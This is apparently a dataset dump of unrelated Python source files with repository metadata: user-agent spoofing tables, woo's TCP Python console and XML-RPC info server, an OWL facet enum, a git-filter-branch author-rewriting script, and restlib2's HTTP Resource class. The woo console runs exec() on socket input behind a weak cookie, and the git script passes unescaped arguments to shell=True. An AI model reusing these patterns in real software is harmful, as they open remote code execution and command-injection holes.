WIN_VERS = ['Windows NT 10.0', 'Windows NT 7.0', 'Windows NT 6.3', 'Windows NT 6.2', 'Windows NT 6.1', 'Windows NT 6.0', 'Windows NT 5.1', 'Windows NT 5.0']
FEATURES = ['; WOW64', '; Win64; IA64', '; Win64; x64', '']
RAND_UAS = ['Mozilla/5.0 ({win_ver}{feature}; rv:{br_ver}) Gecko/20100101 Firefox/{br_ver}',
'Mozilla/5.0 ({win_ver}{feature}) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/{br_ver} Safari/537.36',
'Mozilla/5.0 ({win_ver}{feature}; Trident/7.0; rv:{br_ver}) like Gecko']
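# Hedged sketch (not part of the original module; the index pairing between
# RAND_UAS templates and BR_VERS version lists is an assumption): building a
# randomized user agent string from the tables above:
#
#   import random
#   idx = random.randrange(len(RAND_UAS))
#   ua = RAND_UAS[idx].format(win_ver=random.choice(WIN_VERS),
#                             feature=random.choice(FEATURES),
#                             br_ver=random.choice(BR_VERS[idx]))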
|
gpl-2.0
| 5,276,069,409,270,380,000
| 71.813084
| 187
| 0.671416
| false
| 2.674562
| false
| false
| false
|
woodem/woo
|
py/remote.py
|
1
|
7933
|
# encoding: utf-8
# 2008-2009 © Václav Šmilauer <eudoxos@arcig.cz>
"""
Remote connections to woo: authenticated python command-line over telnet and anonymous socket for getting some read-only information about current simulation.
These classes are used internally in gui/py/PythonUI_rc.py and are not intended for direct use.
"""
import socketserver,xmlrpc.client,socket
import sys,time,os,math
useQThread=False
"Set before using any of our classes to use QThread for background execution instead of the standard thread module. Mixing the two (in case the qt UI is running, for instance) does not work well."
plotImgFormat,plotImgMimetype='png','image/png'
#plotImgFormat,plotImgMimetype='svg','image/svg+xml'
bgThreads=[] # needed to keep background threads alive
class InfoProvider(object):
def basicInfo(self):
import woo
S=woo.master.scene
ret=dict(step=S.step,dt=S.dt,stopAtStep=S.stopAtStep,stopAtTime=S.stopAtTime,time=S.time,id=S.tags['id'] if 'id' in S.tags else None,title=S.tags['title'] if 'title' in S.tags else None,threads=woo.master.numThreads,numBodies=(len(S.dem.par) if S.hasDem else -1),numIntrs=(len(S.dem.con) if S.hasDem else -1),PID=os.getpid())
sys.stdout.flush(); sys.stderr.flush()
return ret
def plot(self):
try:
import woo
S=woo.master.scene
if len(S.plot.plots)==0: return None
fig=S.plot.plot(subPlots=True,noShow=True)[0]
img=woo.master.tmpFilename()+'.'+plotImgFormat
sqrtFigs=math.sqrt(len(S.plot.plots))
fig.set_size_inches(5*sqrtFigs,7*sqrtFigs)
fig.savefig(img)
f=open(img,'rb'); data=f.read(); f.close(); os.remove(img)
# print 'returning %s (%d bytes read)'%(plotImgFormat,len(data))
return xmlrpc.client.Binary(data)
except:
print('Error updating plots:')
import traceback
traceback.print_exc()
return None
class PythonConsoleSocketEmulator(socketserver.BaseRequestHandler):
"""Class emulating python command-line over a socket connection.
The connection is authenticated by requiring a cookie.
Only connections from localhost (127.0.0.*) are allowed.
"""
def setup(self):
if not self.client_address[0].startswith('127.0.0'):
print("TCP Connection from non-127.0.0.* address %s rejected"%self.client_address[0])
return
print(self.client_address, 'connected!')
self.request.send(b'Enter auth cookie: ')
def tryLogin(self):
if self.request.recv(1024).decode().rstrip()==self.server.cookie:
self.server.authenticated+=[self.client_address]
self.request.send(("Woo / TCP\n(connected from %s:%d)\n>>>"%(str(self.client_address[0]),self.client_address[1])).encode())
return True
else:
import time
time.sleep(5)
print("invalid cookie")
return False
def displayhook(self,s):
import pprint
self.request.send(pprint.pformat(s).encode())
def handle(self):
if self.client_address not in self.server.authenticated and not self.tryLogin(): return
import code,io,traceback
buf=[]
while True:
data = self.request.recv(1024).decode().rstrip()
if data=='\x04' or data=='exit' or data=='quit': # \x04 == ^D
return
buf.append(data)
orig_displayhook,orig_stdout=sys.displayhook,sys.stdout
sio=io.StringIO()
continuation=False
#print "buffer:",buf
try:
comp=code.compile_command('\n'.join(buf))
if comp:
sys.displayhook=self.displayhook
sys.stdout=sio
exec(comp)
self.request.send(sio.getvalue().encode())
buf=[]
else:
self.request.send(b'... '); continuation=True
except:
self.request.send(traceback.format_exc().encode())
buf=[]
finally:
sys.displayhook,sys.stdout=orig_displayhook,orig_stdout
if not continuation: self.request.send(b'\n>>> ')
def finish(self):
print(self.client_address, 'disconnected!')
self.request.send(('\nBye ' + str(self.client_address) + '\n').encode())
def _runInBackground(func):
if useQThread:
import woo.config
from PyQt5.QtCore import QThread
class WorkerThread(QThread):
def __init__(self,func_): QThread.__init__(self); self.func=func_
def run(self): self.func()
wt=WorkerThread(func)
wt.start()
global bgThreads; bgThreads.append(wt)
else:
import _thread; _thread.start_new_thread(func,())
class GenericTCPServer(object):
"Base class for socket server, handling port allocation, initial logging and thead backgrounding."
def __init__(self,handler,title,cookie=True,minPort=9000,host='',maxPort=65536,background=True):
import socket, random, sys
self.port=-1
self.host=host
tryPort=minPort
if maxPort is None: maxPort=minPort
while self.port==-1 and tryPort<=maxPort:
try:
self.server=socketserver.ThreadingTCPServer((host,tryPort),handler)
self.port=tryPort
if cookie:
self.server.cookie=''.join([i for i in random.sample('woosucks',6)])
self.server.authenticated=[]
sys.stderr.write(title+" on %s:%d, auth cookie `%s'\n"%(host if host else 'localhost',self.port,self.server.cookie))
else:
sys.stderr.write(title+" on %s:%d\n"%(host if host else 'localhost',self.port))
if background: _runInBackground(self.server.serve_forever)
else: self.server.serve_forever()
except socket.error:
tryPort+=1
if self.port==-1: raise RuntimeError("No free port to listen on in range %d-%d"%(minPort,maxPort))
def runServers(xmlrpc=False,tcpPy=False):
"""Run python telnet server and info socket. They will be run at localhost on ports 9000 (or higher if used) and 21000 (or higer if used) respectively.
The python telnet server accepts only connection from localhost,
after authentication by random cookie, which is printed on stdout
at server startup.
The info socket provides read-only access to several simulation parameters
at runtime. Each connection receives pickled dictionary with those values.
This socket is primarily used by woo-multi batch scheduler.
"""
if tcpPy:
import woo.runtime
srv=GenericTCPServer(handler=woo.remote.PythonConsoleSocketEmulator,title='TCP python prompt',cookie=True,minPort=9000)
woo.runtime.cookie=srv.server.cookie
if xmlrpc:
from xmlrpc.server import SimpleXMLRPCServer
port,maxPort=21000,65535 # minimum port number
while port<maxPort:
try:
info=SimpleXMLRPCServer(('',port),logRequests=False,allow_none=True); break
except socket.error: port+=1
if port==maxPort: raise RuntimeError("No free port to listen on in range 21000-%d"%maxPort)
# register methods, as per http://docs.python.org/library/simplexmlrpcserver.html#simplexmlrpcserver-example
info.register_instance(InfoProvider()) # gets all defined methods by introspection
#prov=InfoProvider()
#for m in prov.exposedMethods(): info.register_function(m)
_runInBackground(info.serve_forever)
print('XMLRPC info provider on http://localhost:%d'%port)
sys.stdout.flush()
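# Hedged client-side sketch (not part of this module): querying the XML-RPC
# info socket started by runServers(xmlrpc=True). 21000 is only the first
# port tried, so the actual port may be higher:
#
#   import xmlrpc.client
#   proxy = xmlrpc.client.ServerProxy('http://localhost:21000', allow_none=True)
#   print(proxy.basicInfo())  # dict with step, dt, time, numBodies, PID, ...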
#if __name__=='__main__':
# p=GenericTCPServer(PythonConsoleSocketEmulator,'Python TCP server',background=False)
# #while True: time.sleep(2)
|
gpl-2.0
| 5,875,989,687,096,059,000
| 42.565934
| 333
| 0.627696
| false
| 3.903988
| false
| false
| false
|
patrickwestphal/owlapy
|
owlapy/vocab/owlfacet.py
|
1
|
2515
|
from enum import Enum
from .namespaces import Namespaces
from owlapy.model import IRI
from owlapy.util.decorators import ClassProperty
class OWLFacet(Enum):
LENGTH = (Namespaces.XSD, 'length', 'length')
MIN_LENGTH = (Namespaces.XSD, 'minLength', 'minLength')
MAX_LENGTH = (Namespaces.XSD, 'maxLength', 'maxLength')
PATTERN = (Namespaces.XSD, 'pattern', 'pattern')
MIN_INCLUSIVE = (Namespaces.XSD, 'minInclusive', '>=')
MIN_EXCLUSIVE = (Namespaces.XSD, 'minExclusive', '>')
MAX_INCLUSIVE = (Namespaces.XSD, 'maxInclusive', '<=')
MAX_EXCLUSIVE = (Namespaces.XSD, 'maxExclusive', '<')
TOTAL_DIGITS = (Namespaces.XSD, 'totalDigits', 'totalDigits')
FRACTION_DIGITS = (Namespaces.XSD, 'fractionDigits', 'fractionDigits')
LANG_RANGE = (Namespaces.RDF, 'langRange', 'langRange')
def __init__(self, ns, short_form, symbolic_form):
"""
:param ns: an owlapy.vocab.namespaces.Namespaces object
:param short_form: a string containing the short form
:param symbolic_form: a string containing the symbolic form
:return:
"""
self.iri = IRI(str(ns), short_form)
self.short_form = short_form
self.symbolic_form = symbolic_form
self.prefixed_name = ns.prefix_name + ':' + short_form
@ClassProperty
@classmethod
def FACET_IRIS(cls):
if not hasattr(cls, '_FACET_IRIS'):
cls._FACET_IRIS = set()
for facet in cls:
cls._FACET_IRIS.add(facet.iri)
return cls._FACET_IRIS
@classmethod
def get_facet(cls, iri):
"""
:param iri: an owlapy.model.IRI object
"""
for vocabulary in cls:
if vocabulary.iri == iri:
return vocabulary
@classmethod
def get_facet_by_short_name(cls, short_form):
"""
:param short_form: a string containing the short name
"""
for vocabulary in cls:
if vocabulary.short_form == short_form:
return vocabulary
@classmethod
def get_facet_by_symbolic_name(cls, symbolic_form):
for vocabulary in cls:
if vocabulary.symbolic_form == symbolic_form:
return vocabulary
@classmethod
def get_facets(cls):
"""
:return: a set of strings containing the symbolic forms of the defined
facets
"""
result = set()
for facet in cls:
result.add(facet.symbolic_form)
return result
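# Hedged usage sketch (illustrative; the 'xsd' prefix assumes
# Namespaces.XSD.prefix_name == 'xsd'):
#
#   facet = OWLFacet.get_facet_by_symbolic_name('>=')
#   assert facet is OWLFacet.MIN_INCLUSIVE
#   assert facet.short_form == 'minInclusive'
#   assert facet.prefixed_name == 'xsd:minInclusive'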
|
gpl-3.0
| -992,769,188,573,107,000
| 31.675325
| 77
| 0.603579
| false
| 3.714919
| false
| false
| false
|
twotwo/tools-python
|
git-filter-branch/main.py
|
1
|
5551
|
# -*- coding: utf-8 -*-
############################################################
#
# Read & Modify commits of a Git Repository
#
############################################################
import os
import sys
import argparse
import subprocess
import datetime
from git import Repo, RefLog
import json
from loguru_helper import message_logger, event_logger, emit_logger
class GitModifier(object):
def __init__(self, repo_path):
self.repo = Repo(repo_path)
@staticmethod
def format(obj):
"""
refer to https://git-scm.com/docs/git-commit-tree#_commit_information
"""
template = """
if test "$GIT_COMMIT" = "{commit_id}"
then
GIT_AUTHOR_NAME="{user}"
GIT_AUTHOR_EMAIL="{email}"
GIT_AUTHOR_DATE="{date}"
GIT_COMMITTER_NAME="{user}"
GIT_COMMITTER_EMAIL="{email}"
GIT_COMMITTER_DATE="{date}"
fi
"""
return template.format(commit_id=obj.get('id'),
date=obj.get('date'),
user=obj.get('author').get('name'),
email=obj.get('author').get('email'))
@staticmethod
def filter_branch(path: str, msg: str, verbose=False):
"""
https://git-scm.com/docs/git-filter-branch
"""
cmd = f"git -C {path} filter-branch -f --env-filter {msg}"
if verbose:
event_logger.info(f"executing...\n{cmd}")
return GitModifier.execute(cmd)
@staticmethod
def execute(cmd: str) -> str:
"""Excuete a shell command, get result
"""
subprocess.run(cmd, shell=True, check=True)
return ''
# with subprocess.Popen(cmd, stdout=subprocess.PIPE, shell=True) as proc:
# lines = proc.stdout.readlines()
# return '\n'.join([line.decode("utf-8").strip() for line in lines])
def chunks(l: list, n: int):
"""
Yield successive n-sized chunks from l.
:param l: the list to divide
:param n: the chunk size
"""
for i in range(0, len(l), n):
yield l[i:i + n]
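# Hedged example (comment-only): chunks() yields successive fixed-size slices,
# with a shorter final chunk when len(l) is not a multiple of n:
#
#   list(chunks([1, 2, 3, 4, 5], 2))  ->  [[1, 2], [3, 4], [5]]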
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Console2RabbitMQ')
parser.add_argument('-p', dest='path', type=str, default="/var/lib/repo")
parser.add_argument('--export', dest='export', action='store_true')
parser.add_argument('--modify', dest='modify', action='store_true')
parser.add_argument('--verbose', dest='verbose', action='store_true')
parser.add_argument('-r', dest='range', type=int, default=20)
parser.add_argument('-f', dest='file', type=str, default="commits.json")
parser.add_argument('-m', dest='match', type=str,
default=None, help="matching email address to change")
parser.add_argument('-e', dest='email', type=str, default=None,
help="change matching email to this email")
parser.add_argument('-n', dest='name', type=str, default=None,
help="change matching email to this name")
args = parser.parse_args()
# event_logger.warning(f'args={args}')
if(args.export):
repo = Repo(args.path)
event_logger.opt(ansi=True).info(f'[{args.path}] begin export ...')
if os.path.exists(args.file):
event_logger.error(f"file [{args.file}] exist, cancel export")
sys.exit(0)
f = open(args.file, 'w')
for log in repo.iter_commits():
committer = log.committer
obj = {'id': log.hexsha,
'author': {'email': committer.email, 'name': committer.name},
'date': str(log.authored_datetime),
'message': str(log.message.strip())}
# emit_logger.info(f'{obj}')
f.write(json.dumps(obj)+'\n')
if args.verbose:
emit_logger.opt(ansi=True).debug(
f'<level>{log.hexsha}</level>\t<cyan>{log.authored_datetime}</cyan>\t<blue>{committer.email}</blue>\t<green>{log.message.strip()}</green>')
f.close()
event_logger.opt(ansi=True).info(f'write to {args.file}')
if(args.modify):
envs = []
event_logger.opt(ansi=True).info(f"read config [{args.file}]...")
with open(args.file) as f:
for line in f:
obj = json.loads(line)
if args.verbose:
event_logger.opt(ansi=True).info(
f"<level>{obj.get('id')}</level>\t<cyan>{obj.get('date')}</cyan>\t<blue>{obj.get('author').get('email')}</blue>\t<green>{obj.get('message')}</green>")
envs.append(GitModifier.format(obj))
event_logger.opt(ansi=True).info("begin filter-branch ...")
for chunk in chunks(envs, args.range):
emit_logger.opt(ansi=True).debug(
GitModifier.filter_branch(args.path, f"'{''.join(chunk)}' -- --all", args.verbose))
if(args.match):
template = """git -C {path} filter-branch -f --env-filter '
if test "$GIT_COMMITTER_EMAIL" = "{match_email}"
then
GIT_AUTHOR_NAME="{name}"
GIT_AUTHOR_EMAIL="{email}"
GIT_COMMITTER_NAME="{name}"
GIT_COMMITTER_EMAIL="{email}"
fi
' -- --all
"""
command = template.format(
path=args.path,
match_email=args.match,
name=args.name,
email=args.email)
if args.verbose:
event_logger.info(f"executing...\n{command}")
GitModifier.execute(command)
|
mit
| 9,088,962,088,859,095,000
| 36.255034
| 174
| 0.542064
| false
| 3.740566
| false
| false
| false
|
bruth/restlib2
|
restlib2/resources.py
|
1
|
35324
|
import io
import time
import hashlib
import collections
from six import add_metaclass
# http://mail.python.org/pipermail/python-list/2010-March/1239510.html
from calendar import timegm
from datetime import datetime, timedelta
from django.conf import settings
from django.http import HttpResponse, HttpRequest
from django.utils.http import http_date, parse_http_date, parse_etags, \
quote_etag
from django.utils.cache import patch_cache_control
from .http import codes, methods
from .serializers import serializers
from .mixins import TemplateResponseMixin
from . import mimeparse
EPOCH_DATE = datetime(1970, 1, 1, 0, 0, 0)
MAX_CACHE_AGE = 60 * 60 * 24 * 30
# Convenience function for checking for existent, callable methods
usable = lambda x, y: isinstance(getattr(x, y, None), collections.Callable)
try:
str = unicode
except NameError:
pass
def no_content_response(response):
"Cautious assessment of the response body for no content."
if not hasattr(response, '_container'):
return True
if response._container is None:
return True
if isinstance(response._container, (list, tuple)):
if len(response._container) == 1 and not response._container[0]:
return True
return False
def get_content_length(request):
try:
return int(request.META.get('CONTENT_LENGTH'))
except (ValueError, TypeError):
return 0
class UncacheableResponse(HttpResponse):
"Response class that will never be cached."
def __init__(self, *args, **kwargs):
super(UncacheableResponse, self).__init__(*args, **kwargs)
self['Expires'] = 0
patch_cache_control(self, no_cache=True, must_revalidate=True,
max_age=0)
# ## Resource Metaclass
# Sets up a few helper components for the `Resource` class.
class ResourceMetaclass(type):
def __new__(cls, name, bases, attrs):
# Create the new class as is to start. Subclass attributes can be
# checked for in `attrs` and handled as necessary relative to the base
# classes.
new_cls = type.__new__(cls, name, bases, attrs)
# If `allowed_methods` is not defined explicitly in attrs, this
# could mean one of two things: that the user wants it to inherit
# from the parent class (if exists) or for it to be set implicitly.
# The more explicit (and flexible) behavior will be to not inherit
# it from the parent class, therefore the user must explicitly
# re-set the attribute.
if 'allowed_methods' not in attrs or not new_cls.allowed_methods:
allowed_methods = []
for method in methods:
if usable(new_cls, method.lower()):
allowed_methods.append(method)
# If the attribute is defined in this subclass, ensure all methods that
# are said to be allowed are actually defined and callable.
else:
allowed_methods = list(new_cls.allowed_methods)
for method in allowed_methods:
if not usable(new_cls, method.lower()):
msg = 'The {0} method is not defined for the resource {1}'
raise ValueError(msg.format(method, new_cls.__name__))
# If `GET` is not allowed, remove `HEAD` method.
if 'GET' not in allowed_methods and 'HEAD' in allowed_methods:
allowed_methods.remove('HEAD')
new_cls.allowed_methods = tuple(allowed_methods)
if not new_cls.supported_content_types:
new_cls.supported_content_types = new_cls.supported_accept_types
if not new_cls.supported_patch_types:
new_cls.supported_patch_types = new_cls.supported_content_types
return new_cls
def __call__(cls, *args, **kwargs):
"""Tests to see if the first argument is an HttpRequest object, creates
an instance, and calls it with the arguments.
"""
if args and isinstance(args[0], HttpRequest):
instance = super(ResourceMetaclass, cls).__call__()
return instance.__call__(*args, **kwargs)
return super(ResourceMetaclass, cls).__call__(*args, **kwargs)
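# A hedged illustration of the metaclass behavior above (MyResource is a
# hypothetical subclass name, not defined in this module):
#
#   resource = MyResource()          # plain instantiation, reusable instance
#   response = MyResource(request)   # instantiates, then dispatches the request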
# ## Resource
# Comprehensive ``Resource`` class which implements sensible request
# processing. The process flow is largely derived from Alan Dean's
# [status code activity diagram][0].
#
# ### Implementation Considerations
# [Section 2][1] of the HTTP/1.1 specification states:
#
# > The methods GET and HEAD MUST be supported by all general-purpose servers.
# > All other methods are OPTIONAL;
#
# The `HEAD` handler is already implemented on the `Resource` class, but
# requires the `GET` handler to be implemented. Although not required, the
# `OPTIONS` handler is also implemented.
#
# Response representations should follow the rules outlined in [Section
# 5.1][2].
#
# [Section 6.1][3] defines that `GET`, `HEAD`, `OPTIONS` and `TRACE` are
# considered _safe_ methods, thus ensure the implementation of these methods do
# not have any side effects. In addition to the safe methods, `PUT` and
# `DELETE` are considered _idempotent_ which means subsequent identical
# requests to the same resource does not result it different responses to
# the client.
#
# Request bodies on `GET`, `HEAD`, `OPTIONS`, and `DELETE` requests are
# ignored. The HTTP spec does not define any semantics surrounding this
# situation.
#
# Typical uses of `POST` requests are described in [Section 6.5][4], but in
# most cases should be assumed by clients as _black box_, neither safe nor
# idempotent. If updating an existing resource, it is more appropriate to use
# `PUT`.
#
# [Section 7.2.1][5] defines that `GET`, `HEAD`, `POST`, and 'TRACE' should
# have a payload for status code of 200 OK. If not supplied, a different 2xx
# code may be more appropriate.
#
# [0]: http://code.google.com/p/http-headers-status/downloads/detail?name
# =http-headers-status%20v3%20draft.png
# [1]: http://tools.ietf.org/html/draft-ietf-httpbis-p2-semantics-18#section-2
# [2]: http://tools.ietf.org/html/draft-ietf-httpbis-p2-semantics-18#section
# -5.1
# [3]: http://tools.ietf.org/html/draft-ietf-httpbis-p2-semantics-18#section
# -6.1
# [4]: http://tools.ietf.org/html/draft-ietf-httpbis-p2-semantics-18#section
# -6.5
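# A minimal usage sketch (not from the library's documentation; the attribute
# names follow the class attributes defined below, and returning a plain dict
# relies on the serialization performed by render() further down):
#
#   class ItemResource(Resource):
#       supported_accept_types = ('application/json',)
#       cache_max_age = 0
#
#       def get(self, request, pk):
#           return {'id': pk}
#
#   # urls.py (Django): url(r'^items/(?P<pk>\d+)/$', ItemResource())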
@add_metaclass(ResourceMetaclass)
class Resource(object):
# ### Service Availability
# Toggle this resource as unavailable. If `True`, the service
# will be unavailable indefinitely. If an integer or datetime is
# used, the `Retry-After` header will be set. An integer can be used
# to define a seconds delta from the current time (good for unexpected
# downtimes). If a datetime is set, the number of seconds will be
# calculated relative to the current time (good for planned downtime).
unavailable = False
# ### Allowed Methods
# If `None`, the allowed methods will be determined based on the resource
# methods defined, e.g. `get`, `put`, `post`. A list of methods can be
# defined explicitly to avoid exposing otherwise defined methods.
allowed_methods = None
# ### Request Rate Limiting
# Enforce request rate limiting. Both `rate_limit_count` and
# `rate_limit_seconds` must be defined and not zero to be active.
# By default, the number of seconds defaults to 1 hour, but the count
# is `None`, therefore rate limiting is not enforced.
rate_limit_count = None
rate_limit_seconds = 60 * 60
# ### Max Request Entity Length
# If not `None`, checks if the request entity body is too large to
# be processed.
max_request_entity_length = None
# ### Supported _Accept_ Mimetypes
# Define a list of mimetypes supported for encoding response entity
# bodies. Defaults to `('application/json',)`
# _See also: `supported_content_types`_
supported_accept_types = ('application/json',)
# ### Supported _Content-Type_ Mimetypes
# Define a list of mimetypes supported for decoding request entity bodies.
# This is independent of the mimetypes encoders for request bodies.
# Defaults to mimetypes defined in `supported_accept_types`.
supported_content_types = None
# ### Supported PATCH Mimetypes
# Define a list of mimetypes supported for decoding request entity bodies
# for `PATCH` requests. Defaults to mimetypes defined in
# `supported_content_types`.
supported_patch_types = None
# ### Validation Caching
# #### Require Conditional Request
# If `True`, `PUT` and `PATCH` requests are required to have a conditional
# header for verifying the operation applies to the current state of the
# resource on the server. This must be used in conjunction with either
# the `use_etags` or `use_last_modified` option to take effect.
require_conditional_request = False
# #### Use ETags
# If `True`, the `ETag` header will be set on responses and conditional
# requests are supported. This applies to _GET_, _HEAD_, _PUT_, _PATCH_
# and _DELETE_ requests. Defaults to Django's `USE_ETAGS` setting.
use_etags = settings.USE_ETAGS
# #### Use Last Modified
# If `True`, the `Last-Modified` header will be set on responses and
# conditional requests are supported. This applies to _GET_, _HEAD_, _PUT_,
# _PATCH_ and _DELETE_ requests.
use_last_modified = False
# ### Expiration Caching
# Define a maximum cache age in seconds or as a date this resource is valid
# for. If an integer in seconds is specified, the 'Cache-Control' 'max-age'
# attribute will be used. If a timedelta is specified, the 'Expires' header
# will be used with a calculated date. Both of these mechanisms are
# non-conditional and are considered _strong_ cache headers. Clients (such
# as browsers) will not send a conditional request until the resource
# has expired locally, this is sometimes referred to as a _cold cache_.
# Most dynamic resources will want to set this to 0, unless it's a
# read-only resource that is ok to be a bit stale.
# - http://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html#sec14.9.3
# - http://www.odino.org/301/rest-better-http-cache
# - http://www.subbu.org/blog/2005/01/http-caching
cache_max_age = None
# Defines the cache_type of the response, public, private or no-cache
# - http://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html#sec14.9.1
cache_type = None
# Applies to cache servers. No part of the response will be cached by
# downstream caches.
# - http://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html#sec14.9.2
cache_no_store = False
# Applies to cache servers. This ensures a cache always revalidates with
# the origin server before responding to a client request.
# - http://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html#sec14.9.4
cache_must_revalidate = False
def __init__(self, **kwargs):
for key in kwargs:
# Neither HTTP handler names nor callable attributes may be overridden
if key in self.allowed_methods or isinstance(
getattr(self, key, None), collections.Callable):
raise TypeError(
'No HTTP handlers nor methods can be overridden.')
if not hasattr(self, key):
tpl = '{0} is not a valid keyword argument for this resource.'
raise TypeError(tpl.format(key))
setattr(self, key, kwargs[key])
# ## Initialize Once, Process Many
# Every `Resource` class can be initialized once since they are stateless
# (and thus thread-safe).
def __call__(self, request, *args, **kwargs):
return self.dispatch(request, *args, **kwargs)
def dispatch(self, request, *args, **kwargs):
# Process the request. This includes all the necessary checks prior to
# actually interfacing with the resource itself.
response = self.process_request(request, *args, **kwargs)
if not isinstance(response, HttpResponse):
# Attempt to process the request given the corresponding
# `request.method` handler.
method_handler = getattr(self, request.method.lower())
response = method_handler(request, *args, **kwargs)
if not isinstance(response, HttpResponse):
# If the return value of the handler is not a response, pass
# the return value into the render method.
response = self.render(request, response, args=args,
kwargs=kwargs)
# Process the response, check if the response is overridden and
# use that instead.
return self.process_response(request, response)
def render(self, request, content=None, status=codes.ok, content_type=None,
args=None, kwargs=None):
"Renders the response based on the content returned from the handler."
response = HttpResponse(status=status, content_type=content_type)
if content is not None:
if not isinstance(content, (str, bytes, io.IOBase)):
accept_type = self.get_accept_type(request)
if serializers.supports_encoding(accept_type):
content = serializers.encode(accept_type, content)
response['Content-Type'] = accept_type
response.content = content
return response
# ## Request Method Handlers
# ### _HEAD_ Request Handler
# Default handler for _HEAD_ requests. For this to be available,
# a _GET_ handler must be defined.
def head(self, request, *args, **kwargs):
return self.get(request, *args, **kwargs)
# ### _OPTIONS_ Request Handler
# Default handler _OPTIONS_ requests.
def options(self, request, *args, **kwargs):
response = UncacheableResponse()
# See [RFC 5789][0]
# [0]: http://tools.ietf.org/html/rfc5789#section-3.1
if 'PATCH' in self.allowed_methods:
response['Accept-Patch'] = ', '.join(self.supported_patch_types)
response['Allow'] = ', '.join(sorted(self.allowed_methods))
response['Content-Length'] = 0
return response
# ## Response Status Code Handlers
# Each handler prefixed with `is_` corresponds to various client (4xx)
# and server (5xx) error checking. For example, `is_not_found` will
# return `True` if the resource does not exist. _Note: all handlers
# must return `True` to fail the check._
# ### Service Unavailable
# Checks if the service is unavailable based on the `unavailable` flag.
# Set the `Retry-After` header if possible to inform clients when
# the resource is expected to be available.
# See also: `unavailable`
def is_service_unavailable(self, request, response, *args, **kwargs):
if self.unavailable:
if type(self.unavailable) is int and self.unavailable > 0:
retry = self.unavailable
elif type(self.unavailable) is datetime:
retry = http_date(timegm(self.unavailable.utctimetuple()))
else:
retry = None
if retry:
response['Retry-After'] = retry
return True
return False
# ### Unauthorized
# Checks if the request is authorized to access this resource.
# Default is a no-op.
def is_unauthorized(self, request, response, *args, **kwargs):
return False
# ### Forbidden
# Checks if the request is forbidden. Default is a no-op.
def is_forbidden(self, request, response, *args, **kwargs):
return False
# ### Too Many Requests
# Checks if this request is rate limited. Default is a no-op.
def is_too_many_requests(self, request, response, *args, **kwargs):
return False
# ### Request Entity Too Large
# Check if the request entity is too large to process.
def is_request_entity_too_large(self, request, response, *args, **kwargs):
content_length = get_content_length(request)
if self.max_request_entity_length and \
content_length > self.max_request_entity_length:
return True
# ### Method Not Allowed
# Check if the request method is not allowed.
def is_method_not_allowed(self, request, response, *args, **kwargs):
if request.method not in self.allowed_methods:
response['Allow'] = ', '.join(sorted(self.allowed_methods))
return True
return False
# ### Unsupported Media Type
# Check if this resource can process the request entity body. Note
# `Content-Type` is set as the empty string, so ensure it is not falsy
# when processing it.
def is_unsupported_media_type(self, request, response, *args, **kwargs):
# Ensure there actually is a request body to be decoded
if not get_content_length(request):
return
if 'CONTENT_TYPE' in request.META:
if not self.content_type_supported(request, response):
return True
if not self.content_encoding_supported(request, response):
return True
if not self.content_language_supported(request, response):
return True
return False
# ### Not Acceptable
# Check if this resource can return an acceptable response.
def is_not_acceptable(self, request, response, *args, **kwargs):
if not self.accept_type_supported(request, response):
return True
if 'HTTP_ACCEPT_LANGUAGE' in request.META:
if not self.accept_language_supported(request, response):
return True
if 'HTTP_ACCEPT_CHARSET' in request.META:
if not self.accept_charset_supported(request, response):
return True
if 'HTTP_ACCEPT_ENCODING' in request.META:
if not self.accept_encoding_supported(request, response):
return True
return False
# ### Precondition Required
# Check if a conditional request is required.
def is_precondition_required(self, request, response, *args, **kwargs):
if not self.require_conditional_request:
return False
if self.use_etags and 'HTTP_IF_MATCH' not in request.META:
return True
if self.use_last_modified and 'HTTP_IF_UNMODIFIED_SINCE' not in \
request.META:
return True
return False
def is_precondition_failed(self, request, response, *args, **kwargs):
# ETags are enabled. Check for conditional request headers. The current
# ETag value is used for the conditional requests. After the request
# method handler has been processed, the new ETag will be calculated.
if self.use_etags and 'HTTP_IF_MATCH' in request.META:
request_etag = parse_etags(request.META['HTTP_IF_MATCH'])[0]
etag = self.get_etag(request, response, request_etag)
if request_etag != etag:
return True
# Last-Modified date enabled. Check for conditional request headers.
# The current modification datetime value is used for the conditional
# requests. After the request method handler has been processed, the
# new Last-Modified datetime will be returned.
if self.use_last_modified and 'HTTP_IF_UNMODIFIED_SINCE' in \
request.META:
last_modified = self.get_last_modified(request, *args, **kwargs)
known_last_modified = EPOCH_DATE + timedelta(
seconds=parse_http_date(
request.META['HTTP_IF_UNMODIFIED_SINCE']))
if known_last_modified != last_modified:
return True
return False
# ### Not Found
# Checks if the requested resource exists.
def is_not_found(self, request, response, *args, **kwargs):
return False
# ### Gone
# Checks if the resource _no longer_ exists.
def is_gone(self, request, response, *args, **kwargs):
return False
# ## Request Accept-* handlers
# Checks if the requested `Accept` mimetype is supported. Defaults
# to using the first specified mimetype in `supported_accept_types`.
def accept_type_supported(self, request, response):
if 'HTTP_ACCEPT' in request.META:
accept_type = request.META['HTTP_ACCEPT']
mimetypes = list(self.supported_accept_types)
mimetypes.reverse()
match = mimeparse.best_match(mimetypes, accept_type)
if match:
request._accept_type = match
return True
# Only if `Accept` explicitly contains a `*/*;q=0.0`
# does it preclude returning a non-matching mimetype.
# This may be desirable behavior (or not), so add this as an
# option, e.g. `force_accept_type`
if mimeparse.quality('*/*', accept_type) == 0:
return False
# If `supported_accept_types` is empty, it is assumed that the resource
# will return whatever it wants.
if self.supported_accept_types:
request._accept_type = self.supported_accept_types[0]
return True
# Checks if the requested `Accept-Charset` is supported.
def accept_charset_supported(self, request, response):
return True
# Checks if the requested `Accept-Encoding` is supported.
def accept_encoding_supported(self, request, response):
return True
# Checks if the requested `Accept-Language` is supported.
def accept_language_supported(self, request, response):
return True
def get_accept_type(self, request):
if hasattr(request, '_accept_type'):
return request._accept_type
if self.supported_accept_types:
return self.supported_accept_types[0]
# ## Conditional Request Handlers
# ### Get/Calculate ETag
# Calculates an etag for the requested entity.
# Provides the client an entity tag for future conditional
# requests.
# For GET and HEAD requests the `If-None-Match` header may be
# set to check if the entity has changed since the last request.
# For PUT, PATCH, and DELETE requests, the `If-Match` header may be
# set to ensure the entity is the same as the client's so the current
# operation is valid (optimistic concurrency).
def get_etag(self, request, response, etag=None):
cache = self.get_cache(request, response)
